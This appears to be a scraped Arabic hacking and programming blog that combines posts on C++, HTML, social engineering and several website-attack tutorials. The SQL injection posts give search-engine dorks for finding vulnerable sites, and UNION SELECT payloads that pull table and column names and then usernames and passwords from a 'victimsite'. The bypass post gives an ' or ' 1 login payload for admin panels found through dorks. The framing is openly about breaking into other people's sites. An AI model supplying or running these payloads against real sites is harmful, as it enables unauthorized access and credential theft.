مقدمة لدورة C Plus Plus

C Plus Plus

C++

جميعا يدرك بوجود العديد من لغات البرمجة. والكثير منا يواجه صعوبة في الوصول الى دورات كاملة لتعلم لغة برمجية معينة. لهذا السبب, أحب أن أقدم لكم دورة خاصة عن "السي بلس بلس". بإمكانك متابعة الدورة من خلال الإشتراك بالقناة و  متابعة المدونة. هذه الدورة ستكون مخصصة للمبتدئين وستكون مؤلفة من عشر دروس عملية, و عشر دروس نظرية. الشروحات العملية ستكون على اليوتيوب, و الشروحات النظرية ستوجد على المدونة.

البرامج

جميع البرامج مؤلفة من بيانات و تعليمات. 

Program = Data + Instruction

البيانات ولها انواع عديدة, ولكن في هذه الدورة سيتم التركيز على الأنواع التالية. 

integer

float

double

char

string

التعلميات: وهي اوامر المبرمج للحاسوب, او إخبار الحاسوب بالمهام التي تريد فعلها. ولكن تذكر بأن الحاسوب هو جهاز قادر على الحفظ و أتباع التعليمات بدقة شديدة. لذلك يجب عليك ادخال جميع التعلميات أو الأموار بدقة حتى يستطيع الحاسوب فهمها وتحويلها الى لغة الحاسوب. 

كل ما ذكر سابقا ينطبق على جميع لغات البرمجة. لذلك هذه المعلومات هي معلومات عامة عن جميع لغات البرمجة. والأن سأنتقل الى الـ سي بلس بلس

ما هي السي بلس بلس؟ هي نفس لغة سي ولكنها مطورة أكثر. إضافة الى ذلك جميع أكواد السي  تعمل على السي بلس بلس ولكن العكس غير صحيح. وذلك لوجود أدوات مميزة في السي بلس بلس يجعلها مميزة و متطورة أكثر من لغة سي

السي بلس بلس تحتوي على الكثير من الأسماء التي يجب حفظها. إضافة الى الكثير من الرموز الهامة. أهم هذه الرموز

Symbols

;

,

[]

// 

*/

!=

=

==

<=

>=

++

+=

أهم هذه الأسماء

Keywords/Reserved Words

if

while

int

float

double

for

do while

الى هناك أكون قد انتهيت من المقدمة. واترككم مع الشرح العملي. اذا لديك سؤال عن هذا الدرس لا تترد بطرحه, وساحاول

 الإجابة عليه إن أستطعت

SQL INJECTION الجزء الثاني

SQL INJECTION 

الجزء الثاني 

السلام عليكم ورحمة الله وبركاته في التدوينة السابقة قمت بشرح حول هذه الثغرة كما سجلت مقطع فيديو كي أوضح لك الشرح. والان وبعون لله تعالى تم شرح الجزء الثاني وهو مقسم الى قسمين قسم مصور و قسم التدوينة 

القسم المموجود في التدوينة ما هو ألا شرح مبسط إضافة الى الأوامر المستخدمة في الشرح.  نبدأ على بركة لله تعالى

قد تعلمنا في التدوينة السابقة كيفية أستخراج اسم القاعدة والان ما علينا سوى الذهاب وتشفير اسم القاعدة لأستخدامها

في الأوامر المراد اتخاذها في سبيل اختراق الموقع

لنفرض ان اسم القاعدة هو 

Database Name: MacBook3arabi

ما عليك سوى نسخ اسم القاعدة والذهاب الى مواقع التشفير (رابط المواقع موجود أسفل المدونة)  وبهذا تتم عملية التشفير

والأن ننتقل الى الأمر لأستخراج اسم الجدول من اسم القاعدة 

لنفرض ان رابط الموقع المستهدف هو 

www.victimsite.com/index.php?macbook3arabiId=30

وكان عدد الأعمدة عشرة والأعمدة المصابة هي أثنان و ثلاثة و خمسة 

والأن ما علي سوى حذف إحدة الاعمدة الماصبة ولتكن اثنان وكتابة

concat(table_name)

وفي نهاية الرابط نكتب 

from information_schema.tables where table_schema=0x6772776f726b5f6772776f726b666f726365

0x6772776f726b5f6772776f726b666f726365 اسم القاعدة المشفر 

فيصبح الرابط كالتالي

www.victimsite.com/index.php?macbook3arabiId=-30 union select 1,concat(table_name),3,4,5from information_schema.tables where tables_schema= 0x6772776f726b5f6772776f726b666f726365--

ولنفرض ان اسم الجدول الموجود هو 

Omar 

والان نحتاج الى استخراج اسماء الاعمدة من اسم الجدول 

Omar

اولا يجب علينا تشفير اسم الجدول باستخدام نفس الموقع (رابط الموقع موجود اسفل التدوينة)  ثم

نضع بدل العمود المصاب الأمر التالي

group_concat(column_name)

وفي نهاية الرابط

from information_schema.columns where table_name=0x63617465676f7279
--
0x63617465676f7279 اسم الجدول المشفر

فيصبح الرابط 

http://victimesite.com/index.php?macbook3arabiId=-30 union select 1,group_concat(column_name)2,3,4,5

from information_schema.columns where table_name=0x63617465676f7279

--

 والان يظهر لدينا اسماء الاعمدة الموجودة في الجدول 

والان نختار اسم العمود المراد استخراج المعلومات منه ولنفرض اسم العمود هو 

Password 

وكتابة بعد الأمر بدل من اسم العمود المصاب

concat(password)

وفي نهاية الرابط

from omar--

منغير تشفير

victimsite.com/index.php?maccbok3arabiId=-30 union select 1,concat(password),3,4,5from omar--

والان تظهر لك الباسورد ثم تأخذ عمود اخر ولنفرض 

User 

وتسبدله بمكان الباسورد فيظهر لك اسم اليوزر 

وبهذا تتوصل الى المعلومات بالنسبة للوصول الى لوحة التحكم فما عليك سوى البحث في محركات البحث مع استخدام جمل

victimsite.com/login.php

وغيرها حتى تصل الى لوحة التحكم وتدخل بينانات ثم تتم الاختراق بإذن لله تعالى 

رابط الموقع التشفير

أضغط هنا

مشاهدة الجزء الأول مصور 

مشاهدة الجزء الثاني مصور

https://www.youtube.com/watch?v=q6EWRUsy0RU

SQL INJECTION

SQL INJECTION 

How to Hack a website using SQL INJECTION method?

هذه التدوينة هي الجزء الأول من الدرس الكامل الذي يتكلم حول ثغرة السكل انجيكشن. ستتكلم الدوينة على جميع ما ذكر في الفيديو ولكن بشئ مختصر 

الـ دورك الثغرة : هناك العديد من الدوارك ولكن سأعطيك ثلاث دوارك شغالة بإذن لله ما عليك سوى وضعها في محركات البحث 

الدوارك هي

• inurl:index.php?id=
• inurl:gallery.php?id=
• inurl:article.php?id=
• inurl:pageid=

 انسخ الدورك وضعه في محرك البحث لتحصل على المواقع المصابة بهذه الثغرة 

فحص الثغرة: كيف تتعرف على ان المواقع مصاب بالثغرة ام لاء؟ 

الفحص بسيط ما عليك سو إضافة إشارة بسيطة واذا واجهت خطأ فإذن الموقع مصاب بالثغرة 

' 

"

انا استخدم الإشارة الأولى ولكن بعض الاحيان استخدم الثاني للتأكد من وجود الثغرة 

الخطأ غالبا يظهر كهذا  

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

قد تختلف من موقع الى اخر ولكن المعنى واحد 

الوصول الى عدد الأعمدة: للوصول الى الأعمدة اتبع الأمر التالي 

www.victimsite.com/index.php/id?=2 ORDER BY N

طبعا الجزء المكبر هو الأمر ام الباقي فهو الرابط المواقع المصاب بالغرة 

للوصول الى العدد بسرعة شاهد الفيديو الموجود اسفل التدوينة 

عدد الأعمدة المصاب:معرفة عدد الأعمدة المصابة 

لنفرض كان عدد الاعمدة الموجودة في الموقع المصاب بالثغرة هو ١٣ 

ما عليك سوى كتابة 

www.victimsite.com/index.php/id?=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

وستظهر لك عدد الأعمدة المصابة 

انتهى الشرح لمشاهدة الفيديو اضغط على المربع الموجود اسفل التدوينة 

https://www.youtube.com/watch?v=oX3261r1bBQ&feature=youtu.be

Social Engineering

الهندسة الإجتماعية Social Engineering 

كي نتعلم كيفية استخدام الهندسة الإجتماعية يجب علينا تعلم مفهوم الهندسة الإجتماعية هذه التدونية ملحقة بالفيديو الذي يدور حول الهندسة الإجتماعية وكيفية الأختراق  بأساليب مختلفة.
الهندسة الإجتماعية: هي دراسة النفسية للضحية بحيث تمكن المخترق من جمع اكبر عدد من المعلومات حول الضحية مما تساعده في اختراقه والوصول الى بياناته. 

أساليب الهندسة الإجتماعية متركزة على ثلاث مراحل
الأولى جمع معلومات عن الضحية
الثانية تحليل المعلومات ودراستها
والاخيرة إيجاد الثغرات الموجودة في الضحية 

قد تختلف اسلوب الهندسة الإجتماعية من شخص الى اخر وهذا يعود الى طبيعة الضحية وخبراته حول هذه المادة 

أساليب شائعة
بعض الاساليب الشائعة في عصرنا الحالي هي
برامج وهمية كمثال اختراق الفيس بوك والخ... او الأجهزة 

FaceBook Account Hacker is FAKE 100%

رسائل تنص بجوائز عالية القيمة مئة دولار او ما شابه
مواقع وهمية بهدف الدخول إليها والتحميل منها

هذه اكثر الأساليب الشائعة في عصرنا الحالي او في العالم العربي

الحماية من الاختراق النفسي وتطوير مهاراتك في الهندسة الإجتماعية

لتطوير نفسك عليك بقرأءة بعض القصص حول المخترقين و قراءة بعض المقالات التي تناقش الهندسة الإجتماعية ولكن ملاحظة لا تعتمد على مصدر واحد أقرأ من اكثر من مصدر وناقش المعلومات وحللها
لا تثق بأحد على الانترنت دون السؤال عنه و عمل بحث حوله
حاول ان تتمع بالغموض لا تنشر كل معلوماتك على الانترنت

 وهنا يكون قد انتهى المقال

للتواصل
Macbook3arabi@hotmail.com

أختراق المواقع عن طريق ثغرة الـ Bypass

Bypass ثغرة الـ

Macbook3arabi

واحببت ان اقدم لكم الدرس الاول MacBook 3arabi السلام عليكم ورحمة الله وبركاته احببت اقول لكم عيد مبارك من 

في طرق أستغلال الثغرات. قد شرحت سابقا عن معنى الثغرة اتمنى مشاهدات المقالات االسابقة الخاصة بالثغرات والاختراق قبل قراءة هذا الموضوع

Bypass ثغرة الـ

هي ثغرة مصاب بها العديد من المواقع لمعرفة الموقع المصاب عليك كتابة هذا الدورك

admin/login.asp

 و في محركات البحث ومشاهدة المواقع

فإذا وجدت الموقع المستهدف من هذه المواقع فعلم انه مصاب بنسبة ١٠٠٪ الثغرة قديمة لذلك من النادر ان تجد موقع جديد مصاب بهذه الثغرة البسيطة 

أستغلال الثغرة: ربما تسأل ولكن كيف اخترق الموقع عن طريق هذه الثغرة (الخطأ الأمني) سنجيب على هذا السؤال  ؟؟؟؟؟

 Admin  كلمة USERNAME   اولا تقوم بكتابة في خانة الـ 

      PASSWORD ثانيا تقوم بكتابة في خانة الـ 

' or ' 1

والان تم الاختراق وبإمكانك الان عمل ما تريد 

Contact Info:

Macbook3arabi@hotmail.com

http://www.Twitter.com/macbook3arabi 

http://www.youtube.com/macbook3rabi

http://www.facebook.com/macbook3arabi

http://www.macbook3arabi.blogspot.com/

الدرس الأول من الـ HTML

The First Lesson Macbook3arabi

السلام عليكم ورحمة الله وبركاته والان بعد ان قدمت لكم مقدمة حول هذه اللغة اتطرق الان معكم الى الدرس الأول وهو درس مهم ومن دون فهم هذا الدرس واستيعاب الأوامر المستخدمة لن تستطيع إكمال باقي الدروس الذي ستطرح إن شاء الله في هذه المدونة. نبدأ على بركة لله

عليك الأن فهم هذه الأوامر جيدا

كما تلاحظ الأوامر بسيطة جدا ودعنا نبدأ بشرحها واحدة واحدة وكما قلت في بداية الدرس هذه الاساسيات ومن دونها لا تتمكن من ان تكمل باقي الدورة

1.  لن يستطيع المتصفح عرض اي شئ html  هذا تقوم بكتابته لإن من دون كتابته وحفظ المفكرة بصيغة <HTML>
2.  هذا بمعنى رأس الصفحة وذلك لتسمية رأس الصفحة <HEAD>
3.  وهو المقصود به عنوان راس الصفحة <HEAD> العنوان وهو يكتب مباشرة بعد الـ <TITLE>
4.  هذا ما تريد كتابته في باقي الصفحة<BODY>

 </title></head></body></html>ربما تسأل نفسك ولكن لماذا 

هذه الأوامر لقفل الامر اي انا استخدمت الامر عنوان راس الصفحة وانتهيت من راس الصفحة فيجب علي قفلها ثم أبدأ في أمر جديد فلو نسيت قفل الاوامر ثم قمت بكتابة اوامر جديدة دون قفل السابقة لن يظهر لك شئ لإنه لن يستطيع فهم اي    

 (/) امر يجب عليه تنفيذه لذلك من الضروري قفل كل امر وطبعا الاختلاف ما بين المفتاح و القفل

إليك هذا المثال المصور 

   

انتهى الشرح 

ملاحظة: بعد كل ثلاث دروس يتم شرح مصور لجميع الدروس على قناة

http://www.youtube.com/macbook3arbi

 

HyperText Markup Language

hypertext markup language

<Html>

السلام عليكم ورحمة الله وبركاته قد تسأل نفسك ما الفائدة من تعلم هذه اللغة. الكثير من زوار هذه المدونة يبحثون عن المواضيع التي تختص في مجال الأختراق ولكن اخي الكريم اختي الكريمة دون تعلم هذه اللغات الموجودة في القائمة 

أسفل لا يمكنك ان تصبح مخترق محترف.  إليك هذه اللغات التي يجب عليك ان تكون متمكنن منها 

1. HTML

2. PHP

3. C++

طبعا هناك العديد من اللغات التي تفيدك في مجال الكمبيوتر ولكن سأبدأ انا في هذه اللغة التي ذكرنا اسمها في العنوان  HTML ألا وهي 

الترجمة: هذه اللغة هي اللغة لصنع صفحات الانترنت و معلومات اخرى يمكن ظهروها على المتصفحات الانترنت
اذن من خلال هذا التعريف تبين لنا ان اي صفحة على الانترنت مصنوعة من هذه اللغة طبعا لمشاهدة اي مثال بإمكانك
 View Page Source ثم الضغط على Google Chrome or Firefox الذهاب الى اي صفحة انترنت باستخدام
طبعا ستظهر لك أكواد لن تفهم منها شئ ولكن بعد استمرارك في هذه اللغة ستسطيع فهم هذه الاكواد وتشكيل صفحة بنفسك . وسنبدأ في الخطوات الاولى التي ستكون طريقك في هذه الدورة

1. اتمنى منك اخي الكريم ان تكن لغتك الانجليزية جيدا 
2. اتمنى ممارسة اللغة البرمجية يوميا كي لا تنساها
3. اتمنى منك قراءة الكتب سواء كانت عربية ام غربية عن هذه اللغة مما تفيدك في التعلم بسرعة

الادوات المحتاجة: لمستخدمي الوندوز ما عليك سوا استخدام الـمفكرة وبالنسبة لمستخدمي الماك بوك اتمنى منكم تحميل   

لا داعي للقلق عن نوع المفكرة ما ذكرته يكفي ولكن هناك اداة ليست موجودة في الحاسوب TextWrangler

هذه الاداة موجودة في داخلك وهي الإرداة النفسية قد تواجد بعض الصعوبات اثناء الدورة نظرا للتقصير منا لذلك اتمنى منك الصبر وقراءة التدوينة في حال عدم فهم الدرس 

نلقاكم في الدرس الأول إن شاء الله 

Contact Us:

Macbook3arabi@hotmail.com

http://www.Twitter.com/macbook3arabi 

http://www.youtube.com/macbook3rabi

http://www.facebook.com/macbook3arabi

http://www.macbook3arabi.blogspot.com